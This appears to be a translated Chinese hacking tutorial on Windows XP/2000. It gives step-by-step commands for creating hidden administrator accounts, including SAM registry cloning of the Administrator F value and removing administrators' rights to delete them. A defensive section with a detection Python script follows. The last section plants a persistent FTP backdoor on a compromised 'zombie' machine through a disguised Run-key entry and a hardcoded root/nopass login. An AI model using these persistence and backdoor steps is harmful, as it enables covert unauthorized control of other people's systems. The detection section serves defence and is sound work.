Hidden Administrator Account

Source: Internet
Author: User

Where the user list is displayed:

1. Control Panel > User Accounts

2. Computer Management > Local Users and Groups

3. The net user command

4. The XP welcome screen (when the classic logon interface is not used), which lists all non-default users of the current system

5. My Computer


This already touches on hacker techniques. Here I will only show how to hide an account; as for folders, you can simply give them the hidden attribute.

I. Deceiving the eye: hiding at the command prompt

Click Start > Run, enter cmd to open the command prompt, type net user Piao$ 123456 /add and press Enter; "The command completed successfully" is displayed. Then type net localgroup administrators Piao$ /add and press Enter. With these two commands at the command prompt we have created a simple "hidden account" named Piao$ with the password 123456 and raised it to administrator privileges.

This method only hides the account from the command prompt (net user); it is powerless against Computer Management. It is therefore not very practical and only fools a careless administrator. It is an entry-level account-hiding technique.

II. Hiding the account in the registry
Is there a technique that hides an account from both the command prompt and Computer Management at the same time? Yes, and all it needs is a small change in the registry, after which the account evaporates from both.

1. Turning the tables: granting Administrators permission to operate on the registry

To work on the system account's keys in the registry, you need to modify values under HKEY_LOCAL_MACHINE\SAM\SAM, but when you get there the key cannot be expanded. This is because by default the system grants the Administrators group only the "Write DAC" and "Read Control" permissions on it, not the permission to modify, so we can neither view nor change the values under SAM. However, the system's other registry editor can be used to grant Administrators the modify permission.

In regedt32.exe go to HKEY_LOCAL_MACHINE\SAM, click the Security menu > Permissions, select the Administrators account in the "Permissions for SAM" window that appears, tick "Full Control" in the permissions section below and click OK. Switching back to Registry Editor, the keys under HKEY_LOCAL_MACHINE\SAM can now be expanded.

Tip: the method above applies only to Windows NT/2000. On Windows XP you can set permissions directly in Registry Editor: right-click the key you want to set permissions on and choose Permissions.

2. Stealing the beams: replacing the hidden account's data with the Administrator's
After obtaining permission on the registry, we can begin creating the hidden account proper. In Registry Editor go to HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names. Every account currently on the system is listed here, including our hidden account. Click Piao$; the "Type" shown for the value on the right is 0x3e9. Now go up one level to HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users and find the item 000003e9: the two correspond, and 000003e9 holds all the information about the hidden account Piao$. In the same way we find that the item corresponding to the Administrator account is 000001f4. Export the Piao$ key to Piao$.reg, and export the F values of 000003e9 and 000001f4 to user.reg and admin.reg respectively. Open admin.reg in Notepad, copy the data following the "F" value, paste it over the "F" value data in user.reg and save. Next, at the command prompt enter net user Piao$ /del to delete the hidden account we created. Finally, import Piao$.reg and user.reg into the registry. At this point the account is complete.

3. Burning the bridge: cutting off the ways to delete the hidden account
Although the hidden account is now hidden from both the command prompt and Computer Management, an experienced system administrator may still delete it with Registry Editor. So how do we make the hidden account rock solid?

Open regedt32.exe and go to HKEY_LOCAL_MACHINE\SAM\SAM again. Set the permissions on SAM and remove all permissions of Administrators. This way, even if an administrator finds the hidden account on the system, there is nothing they can do about it.

III. A dedicated tool: hiding the account in one step
Modifying the registry is risky and cumbersome for new users. In that case you can use the tool hideadmin: download it and unpack it to drive C. Open the command prompt and enter hideadmin Piao$ 123456. If "Create a hiden administrator Piao$ successed!" is displayed, a hidden account named Piao$ with the password 123456 has been created. The hiding effect of this tool is the same as modifying the registry as described above.

IV. Finding and removing hidden accounts
A hidden account poses an enormous danger. Having understood the hiding techniques, we therefore need to understand the corresponding defenses, so that we can thoroughly drive hidden accounts out of the system.
1. Accounts hidden by appending "$"
Detecting this kind of hidden account is relatively simple. After creating it, hackers generally raise the hidden account to administrator privileges, so you only need to enter net localgroup Administrators at the command prompt and every hidden account becomes visible. If that is too much trouble, open Computer Management and look there: an account with "$" appended cannot hide from it.
2. Accounts hidden by modifying the registry
Because an account hidden this way is seen in neither the command prompt nor Computer Management, delete it in the registry instead. Go to HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names and compare the accounts listed there with those in Computer Management; any account that appears only in the registry is a hidden account. Deleting it is just as easy: simply delete the item named after the hidden account.
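As an added example (not part of the original article), the following Python script checks a .reg export of HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users for both kinds of hidden account described in items 1 and 2: names ending in "$", and clone accounts whose F value was copied from another account, found by comparing the RID that is the type of the Names entry with the RID stored at offset 0x30 of the F value. The .reg syntax and the RID offset are assumptions from the standard export and SAM layouts; the embedded export is constructed, and an export from a real system (reg export of that key, run with permission on SAM and read as UTF-16) can be passed to parse_reg instead.

```python
import re, struct

USERS = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"

def parse_reg(text):
    """Return {key path: {value name: (type, bytes)}} for the hex values in a .reg export."""
    keys, cur, cont = {}, None, ""
    for raw in text.splitlines():
        line, cont = cont + raw.strip(), ""   # rejoin hex data wrapped with a trailing '\'
        if line.endswith("\\"):
            cont = line[:-1]
        elif line.startswith("[") and line.endswith("]"):
            cur = line[1:-1]
            keys[cur] = {}
        elif cur is not None and "=" in line:
            name, _, val = line.partition("=")
            m = re.match(r"hex(?:\((\w+)\))?:(.*)", val)   # "hex:" is REG_BINARY, "hex(3e9):" a custom type
            if m:
                keys[cur][name.strip('"')] = (int(m.group(1) or "3", 16),
                                              bytes.fromhex(m.group(2).replace(",", "")))
    return keys

def find_hidden_accounts(keys):
    """The type of a Names\\<user> default value is the RID; a genuine account's F block at Users\\<RID>
    repeats that RID at offset 0x30, so a mismatch means the F block was copied from another account."""
    findings = []
    for path, values in keys.items():
        if path.startswith(USERS + "\\Names\\"):
            name, rid = path.rsplit("\\", 1)[1], values.get("@", (-1,))[0]   # -1: no default value
            f = keys.get(f"{USERS}\\{rid:08X}", {}).get("F", (0, b""))[1]
            if len(f) >= 0x34 and struct.unpack_from("<I", f, 0x30)[0] != rid:
                findings.append((name, f"cloned: F block carries RID {struct.unpack_from('<I', f, 0x30)[0]}, key is RID {rid}"))
            if name.endswith("$"):
                findings.append((name, "name ends in '$': hidden from net user"))
    return findings

def _f_block(rid):   # constructed minimal F value: zeros except the RID field at offset 0x30
    return ",".join(f"{b:02x}" for b in bytes(0x30) + struct.pack("<I", rid) + bytes(4))
# Constructed sample export: Piao$ (RID 0x3e9) whose F block was copied from Administrator (RID 0x1f4).
SAMPLE_REG = f"""[{USERS}\\Names\\Administrator]
@=hex(1f4):
[{USERS}\\Names\\Piao$]
@=hex(3e9):
[{USERS}\\000001F4]
"F"=hex:{_f_block(0x1F4)}
[{USERS}\\000003E9]
"F"=hex:{_f_block(0x1F4)}
"""

FINDINGS = find_hidden_accounts(parse_reg(SAMPLE_REG))   # two findings, both for Piao$
```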
3. Hidden accounts whose name cannot be seen
If a hacker creates a registry-modified hidden account and then removes the Administrator's permission to operate on the registry, the Administrator cannot delete the hidden account through the registry and may not even learn the name of the account the hacker created. But this is not hopeless: we can use Group Policy to stop the hacker logging on with the hidden account. Click Start > Run, enter gpedit.msc to open Group Policy, expand Computer Configuration > Windows Settings > Security Settings > Local Policies > Audit Policy, double-click "Audit policy change" on the right, tick "Success" in the settings window that appears and click OK. Make the same settings for "Audit logon events" and "Audit process tracking".
Once logon-event auditing is enabled, every logon, including logons with hidden accounts, is recorded, so we can use Event Viewer in Computer Management to learn the exact name of the hidden account and even when the hacker logged on. Even if the hacker deletes all the logon logs, the system records which account cleared the system log, so the hacker's hidden account is exposed anyway.

After finding the hidden account's name in Event Viewer, we still cannot delete it because we lack the permission. However, entering net user <hidden account name> 654321 at the command prompt changes the hidden account's password. The hidden account then becomes useless: the hacker can no longer log on with it.

Slimftp2 usage

Here I assume that you have already obtained a shell with administrator or SYSTEM privileges, which is required for the installation.
Installation steps: the installation consists of local settings and server settings.
Local settings: put all the files attached to this document into a folder, here D:\ftp, then run adminftp.exe. The window is divided into three parts: server parameter settings at the top, user account settings at the bottom left and access directory settings at the bottom right.
For the server parameters you only need to set the server port. Because the server usually already runs an FTP server, change the port to a different one; here I set port 3323. The other two parameters are not needed. Next add a user: click New, enter the user name root, select the user and enter the password nopass. Finally enter the path c:\ as localroot, which becomes the root directory of the root user. Click New, enter / in the pop-up window and tick all four permissions below it. Read allows users to download files, write allows them to upload files, list allows them to view the directory listing and admin allows them to rename and delete files on the FTP server. You can create as many users as you need.
Go to the command line, change directory to D:\ftp and enter reg export "HKLM\SOFTWARE\whitsoft development" ftp.reg. All local operations are now complete.
Remote operation: copy ftp.reg, slimftp2.exe and reg.exe to the system directory of the zombie (usually C:\winnt\***32; copy whichever are not already there). Then run:
reg import ftp.reg
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winsock2up /d slimftp2.exe
copy slimftp2.exe %*****root%\*****32
slimftp2.exe
When you run copy slimftp2.exe %*****root%\***** an error is displayed; this is because slimftp2.exe is already in the system directory. Finally, delete ftp.reg!
That's it: even if the zombie restarts, our FTP server will still be running.
However, the port on this server is somewhat special, so how do we access it?
With IE, just enter ftp://root:nopass@192.168.0.1:3323/ (replace 192.168.0.1 with the IP address of your server). What about FTP from the DOS prompt? Like this:
ftp
open 192.168.0.1 3323
root
nopass

Note: you can change the slimftp2.exe file name and the service port, but the corresponding inputs in the steps above must be changed too.
For example, if I rename slimftp2.exe to wsockup.exe, then
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winsock2up /d slimftp2.exe
must be changed to
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winsock2up /d wsockup.exe
